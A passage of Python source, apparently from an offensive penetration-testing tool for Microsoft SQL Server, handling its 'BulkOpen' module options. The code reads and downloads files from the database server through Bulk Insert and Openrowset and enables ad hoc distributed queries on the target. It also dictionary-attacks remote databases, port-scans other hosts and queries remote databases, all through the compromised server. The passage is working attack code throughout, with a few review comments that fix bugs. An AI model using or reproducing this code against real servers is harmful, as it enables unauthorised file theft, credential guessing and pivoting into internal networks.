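            args['print'].badNews("Impossible to read the remote file {0} with Openrowset: {1}".format(remoteFile, data))
            return data
        args['print'].goodNews("Data stored in the remote file {0}:\n{1}".format(remoteFile, data.encode('utf-8')))
        return True

    def runBulkInsertForGet(args, bulkOpen):
        ''' Download a remote file to a local path with the Bulk Insert method; returns True, or the Exception on failure '''
        remoteFile, localFile = args["get-file"][0], args["get-file"][1]
        args['print'].title("Try to get the remote file {0} thanks to the Bulk Insert method".format(remoteFile))
        status = bulkOpen.getFileViaBulkinsert(remoteFile, localFile)
        if isinstance(status, Exception):
            args['print'].badNews("Impossible to get the remote file {0} with Bulk Insert: {1}".format(remoteFile, status))
            return status
        args['print'].goodNews("Data stored in the remote file {0} is saved in the file {1}".format(remoteFile, localFile))
        return True

    def runOpenRowSetForGet(args, bulkOpen):
        ''' Download a remote file to a local path with the Openrowset method; returns True, or the Exception on failure '''
        remoteFile, localFile = args["get-file"][0], args["get-file"][1]
        args['print'].title("Try to get the remote file {0} thanks to the Openrowset method".format(remoteFile))
        status = bulkOpen.getFileViaOpenRowSet(remoteFile, localFile)
        if isinstance(status, Exception):
            args['print'].badNews("Impossible to get the remote file {0} with Openrowset: {1}".format(remoteFile, status))
            return status
        args['print'].goodNews("Data stored in the remote file {0} is saved in the file {1}".format(remoteFile, localFile))
        return True

    if checkOptionsGivenByTheUser(args, ["read-file", "get-file", "enable-ad-hoc-distributed-queries", "disable-ad-hoc-distributed-queries", "search-credentials", "scan-ports", "request-rdb"], checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    bulkOpen = BulkOpen(args)
    bulkOpen.connect()
    # NOTE(review): "test-module" is read but is not in the option list checked above — confirm
    # checkOptionsGivenByTheUser accepts it on its own.
    if args["test-module"] == True:
        bulkOpen.testAll()
    # enable-ad-hoc-distributed-queries
    if args["enable-ad-hoc-distributed-queries"] == True:
        args['print'].title("Try to enable ad hoc distributed queries")
        status = bulkOpen.enableAdHocDistributedQueries()
        if status == True:
            args['print'].goodNews("Ad hoc distributed queries has been enabled")
        else:
            # was "{1}" with a single positional argument: IndexError on every failure
            args['print'].badNews("Impossible to enable ad hoc distributed queries: {0}".format(status))
    # read-file option: a forced method is used alone; otherwise Bulk Insert first, Openrowset as fallback
    if args["read-file"] != None:
        if args["method"] != None:
            if args["method"] == BULKOPEN_METHOD_IN_BULKOPEN:
                runBulkInsertForRead(args, bulkOpen)
            elif args["method"] == OPENROWSET_METHOD_IN_BULKOPEN:
                runOpenRowSetForRead(args, bulkOpen)
        else:
            data = runBulkInsertForRead(args, bulkOpen)
            if isinstance(data, Exception):
                runOpenRowSetForRead(args, bulkOpen)
    # get-file option: same selection/fallback logic as read-file
    if args["get-file"] != None:
        if args["method"] != None:
            if args["method"] == BULKOPEN_METHOD_IN_BULKOPEN:
                runBulkInsertForGet(args, bulkOpen)
            elif args["method"] == OPENROWSET_METHOD_IN_BULKOPEN:
                runOpenRowSetForGet(args, bulkOpen)
        else:
            data = runBulkInsertForGet(args, bulkOpen)
            if isinstance(data, Exception):
                runOpenRowSetForGet(args, bulkOpen)
    # dictionary attack on a remote database, pivoting through the target's openrowset
    if args["search-credentials"] != None:
        remoteIp, remotePort, remoteDb = args["search-credentials"][0], args["search-credentials"][1], args["search-credentials"][2]
        args['print'].title("Dictionnary attack on the database {0}:{1}/{2} with the credentials file {3}".format(remoteIp, remotePort, remoteDb, args['accounts-file']))
        accounts = bulkOpen.searchValideAccounts(remoteIp, remotePort, remoteDb, sqlRequest=DEFAULT_SQL_REQUEST, accountsFile=args['accounts-file'])
        if isinstance(accounts, Exception):
            # openrowset is probably disabled: turn it on, retry, then turn it back off
            status = bulkOpen.enableAdHocDistributedQueries()
            if status == True:
                try:
                    accounts = bulkOpen.searchValideAccounts(remoteIp, remotePort, remoteDb, sqlRequest=DEFAULT_SQL_REQUEST, accountsFile=args['accounts-file'])
                    if isinstance(accounts, Exception):
                        args['print'].badNews("Impossible to use openrowset to connect to a remote database: {0}. Impossible to enable OpenRowset: {1}".format(accounts, status))
                    else:
                        args['print'].goodNews("valid accounts found on {0}:{1}/{2}: {3}".format(remoteIp, remotePort, remoteDb, accounts))
                finally:
                    # We changed a server-wide setting on the target; revert it whether or not the
                    # retry worked (the original only reverted on success, leaving openrowset enabled).
                    bulkOpen.disableAdHocDistributedQueries()
            else:
                args['print'].badNews("Impossible to use openrowset to connect to a remote database: {0}. Impossible to enable OpenRowset: {1}".format(accounts, status))
        else:
            args['print'].goodNews("valid accounts found on {0}:{1}/{2}: {3}".format(remoteIp, remotePort, remoteDb, accounts))
    # request a remote database from the target (the supplied password is echoed in the title)
    if args["request-rdb"] != None:
        rdb = args["request-rdb"]
        args['print'].title("Try to send the request '{0}' to {1}:{2}@{3}:{4}/{5}".format(rdb[5], rdb[3], rdb[4], rdb[0], rdb[1], rdb[2]))
        results = bulkOpen.remoteConnectionWithOpenrowset(ip=rdb[0], port=rdb[1], login=rdb[3], password=rdb[4], database=rdb[2], sqlRequest=rdb[5])
        if isinstance(results, Exception):
            args['print'].badNews("Impossible to request the remote database: {0}".format(results))
        else:
            table = ""
            for l in results:
                table += ' | '.join(map(str, l)) + '\n'
            args['print'].goodNews("Results:\n{0}".format(table))
    # Scan ports with openrowset (results are reported by the scanner itself; only errors are printed here)
    if args['scan-ports'] != None:
        args['print'].title("Scanning ports of {0} through {1}".format(args['scan-ports'][0], args['host']))
        results = bulkOpen.scanPortsWithOpenrowset(ip=args['scan-ports'][0], ports=args['scan-ports'][1], nbThread=SCAN_PORT_NUMBER_THREAD)
        if isinstance(results, Exception):
            args['print'].badNews("Impossible to scan ports: {0}".format(results))
    # disable-ad-hoc-distributed-queries
    if args["disable-ad-hoc-distributed-queries"] == True:
        args['print'].title("Try to disable ad hoc distributed queries")
        status = bulkOpen.disableAdHocDistributedQueries()
        if status == True:
            args['print'].goodNews("Ad hoc distributed queries has been disabled")
        else:
            args['print'].badNews("Impossible to disable ad hoc distributed queries: {0}".format(status))
    bulkOpen.closeConnection()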